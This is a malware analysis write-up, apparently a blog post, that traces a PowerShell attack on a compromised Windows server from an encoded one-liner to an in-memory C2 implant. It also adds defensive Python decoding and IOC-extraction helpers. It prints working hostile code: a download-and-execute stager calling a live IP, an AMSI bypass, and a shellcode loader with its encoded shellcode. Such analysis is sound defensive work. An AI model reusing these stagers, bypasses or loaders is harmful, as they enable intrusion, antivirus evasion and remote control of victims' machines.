Introduction
A while ago a friend's internal Windows server was compromised and infected. This post walks through what the malicious script actually does, stage by stage.
Script analysis
The attack starts by running a PowerShell one-liner:
POWERSHELL
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADUANgAuADIAMwA0AC4AMgAwADkALgAxADAAMwA6ADYAMwA5ADMAOAAvAG4AcgBDAHIAUQAnACkA
Base64-decoding it (the `-enc` argument is UTF-16LE Base64) yields the real command:
POWERSHELL
IEX (New-Object System.Net.Webclient).DownloadString('http://156.234.209.103:63938/nrCrQ')
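The decode step above, written as a small triage helper for command-line telemetry. This is an added example, not code from the original post: it pulls the argument after `-enc`/`-EncodedCommand`, decodes it as UTF-16LE Base64 the way PowerShell does, and flags download-and-execute keywords. The sample command lines are constructed here; the first one re-encodes the decoded script shown above, the other two are benign controls. The function names and the keyword list are the example's own.

```python
import base64
import re

# PowerShell accepts -e, -ec, -en, -enc and -EncodedCommand; the value is Base64 of UTF-16LE text.
ENC_FLAG = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Keywords that, together with an encoded command, point at a download-and-run stager.
SUSPICIOUS = ("DownloadString", "IEX", "Invoke-Expression", "WebClient", "FromBase64String")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries an -enc argument, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    raw = base64.b64decode(m.group(1))
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return None


def triage(cmdline: str) -> dict:
    """Decode and flag a single process command line."""
    decoded = decode_encoded_command(cmdline)
    if decoded is None:
        return {"encoded": False, "decoded": None, "hits": []}
    lowered = decoded.lower()
    hits = [kw for kw in SUSPICIOUS if kw.lower() in lowered]
    return {"encoded": True, "decoded": decoded, "hits": hits}


# Constructed sample command lines (not real telemetry). The first re-encodes the
# decoded stager from the post; the others are benign controls.
STAGER = "IEX (New-Object System.Net.Webclient).DownloadString('http://156.234.209.103:63938/nrCrQ')"
SAMPLE_CMDLINES = [
    "powershell -enc " + base64.b64encode(STAGER.encode("utf-16-le")).decode(),
    "powershell.exe -NoProfile -Command Get-Process",
    "powershell -EncodedCommand " + base64.b64encode("Get-Date".encode("utf-16-le")).decode(),
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(triage(line))
```

Running it prints the decoded script for the first line together with the three matched keywords; the two benign lines produce no hits.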
Fetching that URL returns the following script:
POWERSHELL
$539w80 =[TYpe]("{4}{1}{2}{0}{3}"-f'v','T','eM.con','eRt','Sys') ; $7ge =[type]("{1}{0}"-f'f','rE') ; $X6J = [type]("{3}{1}{4}{0}{2}{5}" -F '.en','ysTeM','co','s','.teXt','DiNG') ; [Byte[]]${c} = $539W80::("{3}{2}{1}{0}" -f'g','4Strin','mBase6','Fro').Invoke(("{77}{46}{73}{78}{50}{69}{92}{20}{63}{44}{24}{90}{80}{8}{51}{95}{42}{82}{83}{53}{17}{33}{45}{11}{7}{64}{12}{43}{41}{23}{86}{60}{91}{89}{49}{36}{25}{31}{38}{66}{96}{75}{19}{88}{39}{21}{84}{72}{28}{26}{18}{56}{9}{71}{74}{79}{54}{76}{62}{57}{68}{93}{94}{81}{52}{14}{34}{13}{29}{40}{58}{87}{16}{15}{3}{22}{61}{65}{6}{70}{30}{67}{1}{5}{48}{59}{47}{85}{2}{37}{0}{10}{55}{27}{32}{35}{4}" -f 'FxqajhjWFlmYz4lVhsXchdrWlxhWUYkXGlcX04Xc','I2NjbGUbH1xiZm1lQCVYZ15WaVhtGxdlaWxrXGkAASAgHl5lYGlrah4XIx5dXElcY1tlWD8lalxaYG1pXEpnZmlca2VAJVxkYGtlbEklZFxranBKHh83F1RUUlxncEtSFyMeampca','Z3BLa1w+JSB0FyAeY2NbJWRca2pw','fNxcjY2NsZRsfXGJmbWVAJSAgHlxjW','WxdAQEpF2VmYGppXE0kF1xbZkRrWmBpa0oka1xK','VtbOFpmaUdrXD4eH1tmX2tcRG','1tlWD8lalxaYG1pXEpnZmlca2VAJVxkY','bjxFUDk7OjAnS0JjPUtsRUg+TyhiSTxBZDtJUTxMKWNgQ0g5Y0lJRWNL','aWY9XGtYXlxjXDtrXD4xMVRjWF9qaVhEJWpcWmBtaVxKZ2ZpXGtlQCVcZGBrZWxJJWRca2pwSlIXNBdYbVZpWG0bAAEBdAABLCoXaWZvWSQXVG8bUlxbZlpWaVhtGxc0F1RvG1JcW2ZaVmlYbR','lgTRcja2ZjSm5cRRcjXmBKcDlcW2','xcgH2pcYGNZZFxqajhrXD4lZWBYZGY7a','JRWc8W0NE','Qsbk1LUTxIOEFOQmxQY0hGJ2JJO2JfSTxBYk08KGJIb','ABI2ppXGtcZFhpWGdWaVhtGxdUVFJcZ3BLUhd','aYGRYZXA7XGVgXVw7JWVgWGRmO2tlXGlpbDoxMVRlYFhkZjtnZzhSFzQXaVxbY2BsWVZcZ3BrVmlYbRsAAQEgAAFUW2BmTVIXNBdcZ3BrVmVpbGtcaVZpWG0bF1RcZ3BLUhdUICgXNB','BrWmVsXQEBdAEgIFxpbFtcWmZpZ1ZpWG0bFyMgICAgXGNsW2ZkVmlYbRs','XGNcW1ZrXF5WWmVsXRdlZm','w5PEVIOTxObl5KSUFMSTo5KjhLRF88RUhfPk84STtLJ14+TW5eSUZvTExDOSk4Qm48SjhRPFE7UDxKQjAnOEcvZFkqaz5YQ0RIPUg','eW1xeWGVYRBcjXGRga2VsSR4fal','kw4TW1jZ1BKaS1ZPWloWChBKUBPUUxLQihiSkwoZ1hhYmJdWnFFKmpnWkRmbE5cLUEpXDtxW1pgRW5xXmxOXGBnZVAuQU5cLSgqXGBrZVBxQ3BYaVw6aGBFbUBoMHFQZlwpWG1eaFA9RW1AaFtuUGZcKVwuWWMvWFApQ','CVqXFpgbWlcSmdmaVxrZUAlXGRga2VsSSVkXG','FpmbGRaYD1lcTlDbEBgLGAtYEMpOEc8cE86MG9hYUNvWGhDX1lnY','2VYP1xjb
FtmRGtcPh4','wQGljKjxOWl','lcXV1sWVZpWG0bAAEgICBUaWtHa2VAUh8XIFQpKmtlQExSFyNUKSprZUBMUhcjVCkqa2VATFIXI1Rpa0d','A7UUJOWm9nbDxsb0UqWnEwK2JpTiJobGQnaGxkMFpPWG1jUU1kYEVwQGFaYG','bGtcaQABASA','IfFzQXa','2NgbFlWXGdwa1ZpWG0bF2Vp','UI','bEklZFxranBKF2','RgRWpoaEVwQEhELUphYidA','ltmX2tcZFZcbWBrWGVWXF1YamVsVmlYbRsAAQAAIFxpbFtcWmZpZ1ZpWG0bFyNcY2xbZmRWaVhtGx8XZFhpW','nOD1IUDk7T2c8WDlRPF','dlZmBrYGpmRx9pXGtcZFhpWEdSAA','EcAAXIXampcaVtbWFZaZmlnVmtcXlZaZWxdF2VmYGtaZ','BgK2lnakRsZylxRU4uTG','Sh4famNYbGg8JVQoJFIgHlNTHh9rYGNnSiVlZmBrWFpmQyVWGxdbZTgkF1xfWlg6cGNZZ','YUQ6R1FCa','1AaTBJUGZGS','Fx','U5CbGI4Oz5JYkhGZyc4Ry9iS1lvSEtEZydNOjliSkdFKEw6RW47RywnTkAvYktPaydORCc8S0JbY0g4ZydLS0VjSDtib01LUTxIOEEpQElqKE1HK2gqRmxhXV1GPkQ7LUlcb1k5UVhLT0lBWEZha0doPkAtTjktLDktJkp','WkZmaVFHKjlpWGtvYmdQWGloWGFEcDhhamdQLGktWEppLVg8aS1Ybjk/amlRRyo+OypfLmNnUGFEcEBhZ2dQYURwRGFqZ1BhRClAYWJnLUpqZDBaT09eTkZbZWBFOkZEYyxfQ25YXWgnbERgK21Jb1lMTSc','SxuTUtRPEg4Q','WtHa2VAUh9cYmZtZUAlWG1WaVhtGxc0F2','s+MCdMS0EpOEJaST1ZRTg+T0xJS0JJKjhQQEk7TURuW2tFOExMbyd','xMVRpa0drZUBSH','WmBE','tcPiVqW2Zfa1xkVlxtYGtYZVZcXVhqZWxWaVhtGxc0F1hnXlZpWG0bAAEg','FKlo/LXBhRGBAP2lEYkBHcEBgLy1nam5GKmlFcE','pnZmlca2VAJVxkYGtlbEklZFxranBKUhc0F1xkZWxpVmlYbRsAAQEgX2teZVxjJVx','sAAAFyFyAiIm8bFzJrZWxmOiVcW2ZaVmlYbRsXa2MkF28bFzInFzQXbxsfF2l','xrWF5cY1w7W1xrWlxjXVxJHh9cZFhFcGNZZFxqajglZWZga1pcY11cSSVkXGtqcEoXa1pcYVlGJG5cRR8fcGNZZFxqajh','vUUFBaiJCOyhuK05sR0pCbE','GRYRWNYYFpcZ0pLSR4fa','2VcaWlsOjExVGVgWGRmO2dnOF','5YYz1lZmBrWGtlXGRcY2dkQGtcSiUgamlca1xkWGlYZ1ZpWG0bFyNcZ3BrVmVpbGtcaVZpWG0bFyMeY1hsa2','pYYzoeFyMeXGdwS1xrWF5','saUsbFzQXcG','HmpbZl9rXERcbWBrWEVcXVhqZUwlKSplYE4la11mamZp','TT1jSW5vXklJQS','fW2Zfa1xEa1w+JWpbZl9r','bEQlZFxranBKUhcjHmpqWGM6ZmtsOBcjampYYzpgamU4FyNbXGNYXEoXI1pgY1lsRxcjam','tqcEpSAAEgJytvJxcjJycnKm8nFyNfa15lXEMlXFtmWlZpWG0bFyNmaVxRMTFUa','RDknOEdmKE1CW01LPltiSjtiOUlFZydJRDlMS2','XGRWXG1ga1hlVlxdWGplbFZpWG0bHxcjIGlrR2tlQBdrWlxhWUYkblxFHx9dXElcY','2hpb09CQUU/K15sTixobGQwWmFJOylfWmRgPU9aZUZcPGFqTFpoQ19ZLmloWG9Db1hgaS1YK2c9cClxWywvaEJbUU
Jk','taXGFZRiRuXEUfVF1cSVxjW2VYPyVqXFpgbWlcSmdmaVxrZUAlXGRga2VsSSVkXGtqcEpSHzcX','cY1w7cEQeH1xncEtcZWBdXDslIFxqY1hdGxcjHlxjbFtmRHBpZm','bZlpW','Gtl','A/FyNaYGNZbEceFyMeXGJmbWVAHh9bZl9rXERcZWBdXDslaVxbY2BsWVZcZ3BrVmlYbRsAASAeW1xeWGVYRBcjXGRga2VsSR4fal5YYz1lZm','tG1RUUlxrcDlSAAFyFyAvF2hcJBdccWBqMTFUaWtHa2VAUh8XXUABAXQBIB9cZ3BLXGtYXGk6JWlcW','1xiZm1lQCVcZGVsaVZpWG0bAAEgICBUW2BmTVIfFyBUaWtHa2VAUh83F1xncGtWXGtYXlxjXFtWa1xeVlplbF0fFyNpXF1dbFlWaVhtGx9','BrWGtlXGRcY2dkQGtcSiUgamlca1xkWGlYZ1ZpWG0bFyNbaVhbZVhrSjExVGplZmBrZVxtZWY6XmVgY2NY','RYmdQcUEpWmBnbDxsRWw8bD1tPGlnbDxpUUcqY','WZrWmxpa2plZjpcZWBdXDslaVxbY2BsWVZcZ3BrVmlYbRsAASBUXGtYXlxjXDtralhaYGtj','AXQBIGZpXFE','pXGtlYGZHZWZga1plbD1pZj1ca1heXGNcO2tcPjExVGNYX2ppWEQlalxaYG1pXE','OiVlZmBrWlxjXVxJJWRca2pwSlIXIx5aYGNZbEcXI15gSnA5XFtgPxcjX','Zca1heXGNcW1ZrXF5WWmVsXR8XIyBaZmNjOGNYbGtpYE0XY2NbJSkqY1xlaVxiF2pqXGlbW1hWWmZpZ1ZrXF5WWmVsXR8faVxrZWBmR2VmYGtaZWw9','SBlbEkxMVRqalxaWjhpXFtjYGw5cGNZZFxqajgla2BkPCVlZmBrWlxjXVxJJWRca2pwSlIXIyAgHl','ubEBeXW1wOWdOKGoqP','TxbWnBaQSxMbVlDXzxhZUlKL0libWk4Oi8','z5jamopWklfLVg7PD9oaWtLWmZsKUhvXy1YPj1tPGlNZVpvRWVQcEEpQGFEcC1DRzBvXmwpKh4fXmVgaWtKKy1calg5ZGZpPTExVGtpXG1lZjolZFxranBKUhc0F1xbZlpWaVh','Hh9c','9YaWs/WU1iZVliWz47aEVlUERqSU1EPGNJ','lma1hbZVhEFyMnFzQXZWZga2BqZkcfaVxrXGRYaVhHUgAAAR8XZFhpWEcAAXIXXGdwa1Zca1he','j8vPkBtQWtNO21fK2BAZENoQ2xQR0ZsPGlnbDxsTW1AaWstPWZCZC1abU5bOEdtQGhFblBmXClGaV8tWnFDcFg8WygrZGwpQGFEcGhhYFhMTj06Qi5qY2Y9RW','JIRG5','rZUBSHzcXXGdwa1','dMRm88UEQnYkpGW2','aVhtGxcjaVxdXWxZVmlYbRsXIycXI1xbZlpWaVhtGx9wZ2Y6MTFUY1hfamlYR','RcR','GVAHh9cY2xbZkRaYGRYZXA7XGVgXVw7J','mXQABASAeNEAsSjBlb0BIRF88RWZvPEknbj1IPEk7TVBfPFpxaypaa0QrcUVwQGlEXkFpaypcLkltTWFZQitgaj5BZk5MY09FbGc7','WmA5SkpwQWRaYGdsPGxFcEBwbytkYEFsaGljKkBhRDpqQllHKjxoTVt'))
[Byte[]]${D} = ( Get-CHiLdITem ("{3}{2}{1}{0}"-f'0','ABle:539W8','arI','V')).VaLUE::("{0}{3}{1}{2}" -f'FromB','64','String','ase').Invoke(("{4}{2}{7}{5}{1}{9}{0}{8}{3}{6}" -f'xe','la2','YG','CV','amNga0xgamQ4JWVm','ZrbDg','kXGtqcEo=','tYZG','WGVYR','VcZF'))
[Byte[]]${e} = (GET-VaRiaBlE ("5"+"39W"+"80") -vAlu )::("{0}{3}{1}{4}{2}" -f 'Fr','Base64S','ring','om','t').Invoke(("{4}{5}{1}{2}{3}{0}" -f'g=','9a2','Bl','QGBqZF','W1xjYF','g'))
function o (${V}){
[Byte[]]${T} = ${V}.("{1}{0}"-f 'ne','clo').Invoke()
for (${x} = 0; ${x} -lt ${V}."Co`UNT"; ${x}++) {
${t}[${V}."CoU`Nt"-${X}-1] = ${V}[${X}] + 3
}
return ${T}
}
${Y} = 9
while(${y} -gt 6){
${C} = &('O')(${C})
${D} = .('O')(${d})
${E} = &('O')(${e})
${y} = ${Y} - 1
}
(GCi ("{1}{2}{3}{0}"-f 'gE','va','rIabL','e:7')).vALUE."asse`mb`ly"."GET`TY`pE"( (GeT-VArIablE ("{1}{0}" -f 'j','X6')).vaLUE::"a`sCIi"."G`ETSt`RING"(${d}))."g`ETFIELD"( ( chiLdITEM ('vAriA'+'BL'+'E:x'+'6j') ).value::"As`ciI"."Ge`TstriNG"(${e}),("{2}{4}{1}{5}{0}{3}"-f 'a',',S','NonPu','tic','blic','t')).("{0}{1}{2}"-f'Set','Val','ue').Invoke(${N`ULl},${t`RUE})
.("{0}{1}"-f'ie','x')( $x6J::"a`sCii"."g`ETstR`iNg"(${C}))
After deobfuscation (the `while` loop counts `$y` down from 9 to 7, so the reverse-and-add-3 routine `o` runs three times: the net transform is a single reversal plus 9 per byte), we get:
POWERSHELL
# 1. Bypass Windows Defender / AMSI (Antimalware Scan Interface)
$AmsiType = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
$AmsiField = $AmsiType.GetField('amsiInitFailed', [System.Reflection.BindingFlags]'NonPublic,Static')
$AmsiField.SetValue($null, $true)
# 2. Prepare the payload (the contents of variable $c)
# Only the decryption logic is shown here; the real payload is usually a Cobalt Strike Beacon or another C2 agent
$PayloadBase64 = "FxqajhjWFlmYz4lVhsXchdrWlxhWUYkXGlcX04Xc..." # (the very long string in the original code)
$PayloadBytes = [System.Convert]::FromBase64String($PayloadBase64)
# 3. Decrypt the payload
# Algorithm: reverse the byte array and add 9 to every byte
[Array]::Reverse($PayloadBytes)
for ($i = 0; $i -lt $PayloadBytes.Length; $i++) {
$PayloadBytes[$i] = $PayloadBytes[$i] + 9
}
# Convert to a script string
$DecodedScript = [System.Text.Encoding]::ASCII.GetString($PayloadBytes)
# 4. Run the malicious code
Invoke-Expression $DecodedScript
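Added example (not code from the post or from the malware): a Python re-implementation of the stage-1 transform, written the way the obfuscated function `o` actually runs it, three rounds of reverse-then-add-3, next to the shortcut used in the deobfuscated listing (one reversal plus 9). `stage1_encode` is a hypothetical helper that exists only to build a test vector; the sample script and blob are constructed, not the real payload. The `& 0xFF` is a deliberate difference: the PowerShell original writes into a `[Byte[]]` and would throw on a value above 255, so the real payload never overflows, but an analyst's decoder should not crash when fed something else.

```python
import base64


def stage1_round(buf: bytes, delta: int = 3) -> bytes:
    # One call of the obfuscated function `o`: reverse the array, then add delta to every byte.
    # & 0xFF keeps each value a byte; the PowerShell original would throw on overflow instead.
    return bytes((b + delta) & 0xFF for b in reversed(buf))


def stage1_decode(b64: str, rounds: int = 3, delta: int = 3) -> str:
    # The sample's while loop starts at y = 9 and runs while y > 6, i.e. three rounds.
    data = base64.b64decode(b64)
    for _ in range(rounds):
        data = stage1_round(data, delta)
    return data.decode("ascii", errors="replace")


def net_effect(b64: str) -> str:
    # Shortcut from the deobfuscated listing: three reversals collapse to one, 3 x 3 = 9.
    data = base64.b64decode(b64)
    return bytes((b + 9) & 0xFF for b in reversed(data)).decode("ascii", errors="replace")


def stage1_encode(script: str, rounds: int = 3, delta: int = 3) -> str:
    # Inverse transform (hypothetical helper): used here only to build a constructed test vector.
    data = script.encode("ascii")
    for _ in range(rounds):
        data = bytes((b - delta) & 0xFF for b in reversed(data))
    return base64.b64encode(data).decode()


# Constructed sample (not the malware's payload): a harmless one-liner wrapped the same way.
SAMPLE_SCRIPT = "Write-Host 'constructed stage-1 test vector'"
SAMPLE_BLOB = stage1_encode(SAMPLE_SCRIPT)

if __name__ == "__main__":
    print(stage1_decode(SAMPLE_BLOB))
```

Because reversal and a constant add commute, the order of the two operations inside a round does not matter; what matters is the parity of the round count (odd: the output is reversed once) and the summed offset.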
Reversing, re-joining and decoding the Base64 gives:
POWERSHELL
Set-StrictMode -Version 2
function func_get_proc_address {
Param ($var_module, $var_procedure)
$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}
function func_get_delegate_type {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
[Parameter(Position = 1)] [Type] $var_return_type = [Void]
)
$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')
return $var_type_builder.CreateType()
}
If ([IntPtr]::size -eq 8) {
[Byte[]]$var_code = [System.Convert]::FromBase64String('32ugx9PL6yMjI2JyYnNxcnVrEvFGa6hxQ2uocTtrqHEDa6hRc2sslGlpbhLqaxLjjx9CXyEPA2Li6i5iIuLBznFicmuocQOoYR9rIvNFols7KCFWUaijqyMjI2um41dEayLzc6hrO2eoYwNqIvPAdWvc6mKoF6trIvVuEuprEuOPYuLqLmIi4hvDVtJvIG8HK2Ya8lb7e2eoYwdqIvNFYqgva2eoYz9qIvNiqCerayLzYntie316eWJ7YnpieWugzwNicdzDe2J6eWuoMcps3Nzcfkkjap1USk1KTUZXI2J1aqrFb6rSYplvVAUk3PZrEuprEvFuEuNuEupic2JzYpkZdVqE3PbKsCMjI3lrquJim4xyIyNuEupicmJySSBicmKZdKq85dz2yFp4a6riaxLxaqr7bhLqcUsjEeOncXFimch2DRjc9muq5Wug4HNJKXxrqtKZPCMjI0kjS6MQIyNqqsNimicjIyNimVZlvaXc9muq0muq+Wrk49zc3NxuEupxcWKZDiU7WNz2puMspr4iIyNr3Owsp68iIyPIkMrHIiMjy6Hc3NwMQkdOSk0MYExOU0JRRgxwRlFVRlEMVRsMYnNqDGdkbnkVbHtrahcWE3lrIyS/6B56BW6IGqPtjOaJRXTaZBbxeR6DMGOffjuO3q4PV1sRI2JAQEZTVxkDQlNTT0pAQldKTE0MW0tXTk8IW05PDwNCU1NPSkBCV0pMTQxbTk8PA0pOQkRGDAkuKWJAQEZTVw5vQk1EVkJERhkDRk0OQlYuKWJAQEZTVw5mTUBMR0pNRBkDSkdGTVdKV1oPA0BMTlNRRlBQLil2UEZRDmJERk1XGQNuTFlKT09CDBYNEwMLdEpNR0xUUANtdwMVDRIYA3RKTRUXGANbFRcKA2JTU09GdEZBaEpXDBYQFA0QFQMLaGt3bm8PA09KSEYDZEZASEwKA2BLUUxORgwVGg0TDRAXGhQNEhMTA3BCRUJRSgwWEBQNEBUuKSPuW4w1DK+sJJZ88CArvkR8SRnjEhLbvU5JcycdEF3s1WpByvfgIu70VUbxRv4iMu0qfawLh5lMOCNindOWgXXc9msS6pkjI2MjYpsjMyMjYppjIyMjYpl7h3DG3PZrsHBwa6rEa6rSa6r5YpsjAyMjaqraYpkxtarB3PZroOcDpuNXlUWoJGsi4KbjVvR7e3trJgMrIyNz4Mtc3tzcEhYVDREQFw0RExoNEhMQIxn9S5I=')
for ($x = 0; $x -lt $var_code.Count; $x++) {
$var_code[$x] = $var_code[$x] -bxor 35
}
$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)
$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
}
This is the landing of an in-memory implant; the flow is as follows:
POWERSHELL
# 1. Decode the shellcode
[byte[]]$code = [Convert]::FromBase64String("...")
# 2. XOR-decrypt it (single-byte key 35)
for ($i = 0; $i -lt $code.Length; $i++) {
$code[$i] = $code[$i] -bxor 35
}
# 3. Resolve VirtualAlloc
$VirtualAlloc = GetProcAddress("kernel32.dll", "VirtualAlloc")
# 4. Allocate memory (RWX: MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
$mem = VirtualAlloc(0, $code.Length, 0x3000, 0x40)
# 5. Write the shellcode into it
[Marshal]::Copy($code, 0, $mem, $code.Length)
# 6. Execute the shellcode
$func = (delegate pointing to $mem)
$func.Invoke(0)
Next, let's try to analyse the in-memory implant itself.
In-memory implant analysis
First, use Python to restore the implant to a binary:
PYTHON
import base64

# The Base64 blob is the one passed to FromBase64String in the stager above
data = "<Base64 string from the stager>"
decoded = base64.b64decode(data)
# Undo the byte-wise XOR with key 35
shellcode = bytes([b ^ 35 for b in decoded])
with open("shellcode.bin", "wb") as f:
    f.write(shellcode)
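Added example that extends the Python snippet above (not the post's own code): after undoing the XOR it scans the decoded bytes for printable ASCII and UTF-16LE runs and pulls out IPv4 addresses and URI-looking paths, which recovers the C2 indicators without opening the file in IDA. The blob is constructed here from filler bytes around the IP and URI reported later in the post (the URI is given with a leading slash), plus a UTF-16LE library name; `XOR_KEY`, `min_len` and the helper names are the example's own.

```python
import base64
import re

XOR_KEY = 35  # single-byte key used by the stager's -bxor loop


def decode_stage2(b64_blob: str, key: int = XOR_KEY) -> bytes:
    # Same two steps as the snippet above: Base64 decode, then XOR every byte with the key.
    return bytes(b ^ key for b in base64.b64decode(b64_blob))


def extract_strings(blob: bytes, min_len: int = 6) -> list:
    # Printable ASCII runs first, then UTF-16LE runs (Windows APIs and beacon configs use both).
    ascii_runs = [m.group().decode("ascii")
                  for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob)]
    utf16_runs = [m.group().decode("utf-16-le")
                  for m in re.finditer(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, blob)]
    return ascii_runs + utf16_runs


IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def network_iocs(strings: list) -> dict:
    # What an analyst wants first: addresses and URI-looking paths, de-duplicated.
    ips = sorted({ip for s in strings for ip in IPV4.findall(s)})
    uris = sorted({s for s in strings if s.startswith("/")})
    return {"ips": ips, "uris": uris}


# Constructed blob (NOT the real shellcode): filler bytes around the IP and URI reported
# in the post, plus a UTF-16LE library name, XOR-encoded the way the stager expects.
FAKE_SHELLCODE = (
    b"\x90" * 8
    + b"156.234.209.103\x00" + b"\x00" * 4
    + b"/admin/Compare/Server/v8/API/DGMZ6OXHI450ZH\x00" + b"\x00" * 2
    + "wininet".encode("utf-16-le") + b"\x00\x00"
    + b"\xcc" * 8
)
SAMPLE_BLOB = base64.b64encode(bytes(b ^ XOR_KEY for b in FAKE_SHELLCODE)).decode()

if __name__ == "__main__":
    found = extract_strings(decode_stage2(SAMPLE_BLOB))
    print(found)
    print(network_iocs(found))
```

On a real sample the same pass is worth running before and after the XOR: a blob whose decoded form suddenly has many readable runs while the raw form has none is itself a sign the key was right.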
The restored file is killed by Defender the moment it is written:

That settles it! After allowing the file through, first identify the file type: opening it in DIE gives no type hint:

Loading it directly in IDA, the following IP data turns up:

AI-assisted analysis gives the following result:
| Item | Value |
|---|---|
| C2 | 156.234.209.103 |
| URI | admin/Compare/Server/v8/API/DGMZ6OXHI450ZH |
| Protocol | HTTP |
| Communication library | WinInet |
| Data transfer | chunked-like |
| Execution | in-memory |
| sleep | not explicit (needs stage 2) |
| jitter | not explicit |
Conclusion
The in-memory implant that finally lands is a C2 controller through which arbitrary commands can be executed remotely.

This article is original work released under the CC BY-NC-SA 4.0 licence; when reposting in full, please credit 烧鸡.